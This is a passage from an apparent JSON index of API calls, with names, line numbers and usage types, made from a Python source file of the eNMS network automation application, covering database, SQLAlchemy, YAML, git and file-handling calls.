"eNMS.database.db.objectify", 
"line_number": 101, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 101, "usage_type": "name"}, {"api_name": "eNMS.database.db.delete", "line_number": 130, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 130, "usage_type": "name"}, {"api_name": "eNMS.database.db.factory", "line_number": 136, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 136, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.relationships", "line_number": 145, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 145, "usage_type": "name"}, {"api_name": "eNMS.database.db.objectify", "line_number": 146, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 146, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 165, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 165, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 175, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 175, "usage_type": "name"}, {"api_name": "re.search", "line_number": 179, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 185, "usage_type": "call"}, {"api_name": "eNMS.database.db.fetch", "line_number": 196, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 196, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.delete", "line_number": 199, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 199, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 199, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.dict_to_string", "line_number": 203, "usage_type": "call"}, {"api_name": "eNMS.variables.vs", "line_number": 203, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 203, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 203, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.dict_to_string", "line_number": 204, "usage_type": "call"}, {"api_name": "eNMS.variables.vs", "line_number": 204, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 204, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 204, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 206, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 206, "usage_type": "name"}, {"api_name": "difflib.unified_diff", "line_number": 212, "usage_type": "call"}, {"api_name": "eNMS.database.db.objectify", "line_number": 224, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 224, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 225, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 225, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 243, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 243, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 243, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 251, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 251, "usage_type": "name"}, {"api_name": "eNMS.database.db.query", "line_number": 256, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 256, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 257, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", 
"line_number": 257, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.properties", "line_number": 259, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 259, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 263, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 263, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.properties", "line_number": 267, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 267, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.properties", "line_number": 268, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 268, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 273, "usage_type": "call"}, {"api_name": "eNMS.database.db.query", "line_number": 273, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 273, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 276, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 276, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 277, "usage_type": "call"}, {"api_name": "eNMS.database.db.delete_all", "line_number": 288, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 288, "usage_type": "name"}, {"api_name": "eNMS.database.db.delete", "line_number": 292, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 292, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 297, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 297, "usage_type": "name"}, {"api_name": "eNMS.database.db.delete", "line_number": 302, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 302, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 304, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 304, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 309, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 309, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 311, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 311, "usage_type": "name"}, {"api_name": "eNMS.database.db.delete_instance", "line_number": 313, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 313, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 321, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 321, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 324, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 324, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 332, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 332, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 333, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.path", "line_number": 333, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 333, "usage_type": "name"}, {"api_name": "ruamel.yaml.dump", "line_number": 344, "usage_type": "call"}, {"api_name": "ruamel.yaml", "line_number": 344, "usage_type": "name"}, {"api_name": "ruamel.yaml.dump", "line_number": 348, "usage_type": "call"}, {"api_name": "ruamel.yaml", "line_number": 348, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.server_version", "line_number": 351, 
"usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 351, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 352, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 352, "usage_type": "name"}, {"api_name": "ruamel.yaml.dump", "line_number": 355, "usage_type": "call"}, {"api_name": "ruamel.yaml", "line_number": 355, "usage_type": "name"}, {"api_name": "tarfile.open", "line_number": 356, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 358, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.models", "line_number": 368, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 368, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.model_properties", "line_number": 370, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 370, "usage_type": "name"}, {"api_name": "sqlalchemy.cast", "line_number": 384, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 384, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.models", "line_number": 391, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 391, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.relationships", "line_number": 393, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 393, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.aliased", "line_number": 394, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.models", "line_number": 394, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 394, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.aliased", "line_number": 410, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.models", "line_number": 410, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 410, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.aliased", "line_number": 416, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.models", "line_number": 416, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 416, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 425, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 425, "usage_type": "name"}, {"api_name": "eNMS.database.db.query", "line_number": 426, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 426, "usage_type": "name"}, {"api_name": "sqlalchemy.and_", "line_number": 433, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.OperationalError", "line_number": 450, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.properties", "line_number": 471, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 471, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 473, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 473, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 476, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 476, "usage_type": "name"}, {"api_name": "eNMS.database.db.get_credential", "line_number": 480, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 480, "usage_type": "name"}, {"api_name": "flask_login.current_user.name", "line_number": 481, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 481, "usage_type": "name"}, {"api_name": "eNMS.environment.env.get_password", "line_number": 485, "usage_type": "call"}, 
{"api_name": "eNMS.environment.env", "line_number": 485, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 492, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 492, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 493, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 493, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 498, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 498, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.custom.parse_configuration_property", "line_number": 500, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.custom", "line_number": 500, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 500, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.configuration_properties", "line_number": 501, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 501, "usage_type": "name"}, {"api_name": "eNMS.forms.form_factory.register_parameterized_form", "line_number": 505, "usage_type": "call"}, {"api_name": "eNMS.forms.form_factory", "line_number": 505, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.form_properties", "line_number": 506, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 506, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 509, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 509, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 510, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 510, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.path", "line_number": 513, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 513, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 515, "usage_type": "call"}, {"api_name": "git.Repo", "line_number": 516, "usage_type": "call"}, {"api_name": "git.Repo.clone_from", "line_number": 519, "usage_type": "call"}, {"api_name": "git.Repo", "line_number": 519, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 521, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 521, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 525, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 525, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 526, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 526, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 529, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 529, "usage_type": "name"}, {"api_name": "git.Repo", "line_number": 530, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.path", "line_number": 530, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 530, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.path", "line_number": 531, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 531, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.configuration_properties", "line_number": 537, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 537, "usage_type": "name"}, {"api_name": "git.Repo", "line_number": 541, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.path", "line_number": 541, "usage_type": 
"attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 541, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 542, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 542, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.configuration_properties", "line_number": 543, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 543, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 546, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.custom.parse_configuration_property", "line_number": 548, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.custom", "line_number": 548, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 548, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 556, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 556, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.migration_path", "line_number": 556, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 556, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 559, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 559, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 563, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 563, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.reports", "line_number": 574, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 574, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 577, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 577, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.aliased", "line_number": 580, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.models", "line_number": 580, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 580, "usage_type": "name"}, {"api_name": "eNMS.database.db.query", "line_number": 582, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 582, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 583, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 583, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 587, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 587, "usage_type": "name"}, {"api_name": "flask_login.current_user.name", "line_number": 587, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 587, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 591, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 591, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log_queue", "line_number": 599, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 599, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 603, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 603, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 615, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 615, "usage_type": "name"}, {"api_name": "eNMS.database.db.rbac_error", "line_number": 617, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 617, "usage_type": "name"}, {"api_name": "eNMS.database.db.query", "line_number": 618, "usage_type": "call"}, 
{"api_name": "eNMS.database.db", "line_number": 618, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 619, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 619, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 622, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 622, "usage_type": "name"}, {"api_name": "flask_login.current_user.name", "line_number": 622, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 622, "usage_type": "name"}, {"api_name": "operator.attrgetter", "line_number": 626, "usage_type": "call"}, {"api_name": "eNMS.database.db.fetch", "line_number": 628, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 628, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 633, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 633, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.automation", "line_number": 638, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 638, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.automation", "line_number": 639, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 639, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 658, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 658, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 661, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 661, "usage_type": "name"}, {"api_name": "eNMS.database.db.rbac_error", "line_number": 663, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 663, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 668, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 668, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 674, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.models", "line_number": 675, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 675, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 677, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 677, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.expression.true", "line_number": 677, "usage_type": "call"}, {"api_name": "eNMS.database.db.query", "line_number": 680, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 680, "usage_type": "name"}, {"api_name": "sqlalchemy.or_", "line_number": 680, "usage_type": "call"}, {"api_name": "eNMS.environment.env.log", "line_number": 687, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 687, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 688, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 688, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 689, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 691, "usage_type": "call"}, {"api_name": "eNMS.database.db.session.query", "line_number": 694, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 694, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 694, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 694, "usage_type": "attribute"}, {"api_name": 
"eNMS.variables.vs", "line_number": 694, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 695, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 695, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 699, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 707, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 707, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 711, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 711, "usage_type": "name"}, {"api_name": "eNMS.database.db.factory", "line_number": 712, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 712, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 713, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 713, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 713, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 714, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 714, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 717, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 717, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 718, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 718, "usage_type": "name"}, {"api_name": "eNMS.database.db.query", "line_number": 719, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 719, "usage_type": "name"}, {"api_name": "sqlalchemy.or_", "line_number": 719, "usage_type": "call"}, {"api_name": "eNMS.database.db.fetch", "line_number": 723, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 723, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 724, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 724, "usage_type": "name"}, {"api_name": "operator.itemgetter", "line_number": 750, "usage_type": "call"}, {"api_name": "eNMS.database.db.fetch", "line_number": 759, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 759, "usage_type": "name"}, {"api_name": "operator.itemgetter", "line_number": 809, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 824, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 839, "usage_type": "call"}, {"api_name": "eNMS.database.db.fetch", "line_number": 858, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 858, "usage_type": "name"}, {"api_name": "operator.itemgetter", "line_number": 861, "usage_type": "call"}, {"api_name": "eNMS.database.db.fetch", "line_number": 873, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 873, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 900, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 900, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 904, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 904, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 904, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 911, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.migration_path", "line_number": 911, "usage_type": "attribute"}, {"api_name": 
"eNMS.variables.vs", "line_number": 911, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 912, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 913, "usage_type": "call"}, {"api_name": "ruamel.yaml.dump", "line_number": 915, "usage_type": "call"}, {"api_name": "ruamel.yaml", "line_number": 915, "usage_type": "name"}, {"api_name": "eNMS.database.db.export", "line_number": 916, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 916, "usage_type": "name"}, {"api_name": "ruamel.yaml.dump", "line_number": 924, "usage_type": "call"}, {"api_name": "ruamel.yaml", "line_number": 924, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.server_version", "line_number": 926, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 926, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 927, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 927, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 933, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 933, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log_events", "line_number": 934, "usage_type": "attribute"}, {"api_name": "eNMS.environment.env", "line_number": 934, "usage_type": "name"}, {"api_name": "eNMS.database.db.delete_all", "line_number": 939, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 939, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 940, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 941, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 941, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 943, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.migration_path", "line_number": 943, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 943, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 945, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 945, "usage_type": "name"}, {"api_name": "ruamel.yaml.load", "line_number": 948, "usage_type": "call"}, {"api_name": "ruamel.yaml", "line_number": 948, "usage_type": "name"}, {"api_name": "ruamel.yaml.SafeLoader", "line_number": 948, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs.server_version", "line_number": 949, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 949, "usage_type": "name"}, {"api_name": "flask_login.current_user", "line_number": 951, "usage_type": "name"}, {"api_name": "flask_login.current_user.name", "line_number": 952, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 952, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 954, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 954, "usage_type": "name"}, {"api_name": "ruamel.yaml.load", "line_number": 967, "usage_type": "call"}, {"api_name": "ruamel.yaml", "line_number": 967, "usage_type": "name"}, {"api_name": "ruamel.yaml.CLoader", "line_number": 967, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 968, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 968, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 969, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 969, "usage_type": "name"}, {"api_name": 
"eNMS.variables.vs.relationships", "line_number": 972, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 972, "usage_type": "name"}, {"api_name": "eNMS.environment.env.get_password", "line_number": 975, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 975, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.private_properties_set", "line_number": 977, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 977, "usage_type": "name"}, {"api_name": "eNMS.database.db.factory", "line_number": 983, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 983, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 1001, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 1001, "usage_type": "call"}, {"api_name": "eNMS.database.db.session.rollback", "line_number": 1003, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1003, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1003, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 1006, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1006, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1006, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1007, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1007, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1008, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1008, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1010, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1010, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1011, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1011, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.relationships", "line_number": 1016, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1016, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1021, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1021, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1030, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1030, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 1039, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 1039, "usage_type": "call"}, {"api_name": "eNMS.database.db.session.rollback", "line_number": 1041, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1041, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1041, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1044, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1044, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1044, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1044, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 1045, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1045, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1045, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1051, 
